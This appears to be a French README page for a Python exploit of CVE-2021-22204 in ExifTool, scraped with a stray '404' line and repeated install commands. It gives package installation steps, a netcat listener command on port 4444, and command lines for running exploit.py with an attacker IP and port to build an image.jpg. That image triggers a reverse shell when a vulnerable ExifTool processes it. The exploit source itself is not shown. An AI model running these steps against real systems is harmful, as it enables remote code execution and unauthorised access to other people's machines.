
Exploit Python pour CVE-2021-22204 dans ExifTool, générant une image malveillante qui déclenche un reverse shell lorsqu'elle est traitée par des versions vulnérables.
Exploit Python pour la vulnérabilité CVE-2021-22204 dans Exiftool.
404 introuvable
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {Votre adresse IP} {Votre port d'écoute}
./exploit.py {Votre adresse IP} {Votre port d'écoute}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
La CVE-2021-22204 a été découverte et signalée par William Bowling. (@wcbowling)
Cet exploit a été créé en étudiant le correctif d'exiftool après que la CVE ait déjà été signalée.
Et le fichier image.jpg déclenchera la vulnérabilité lorsqu'il sera ouvert avec une version vulnérable d'exiftool.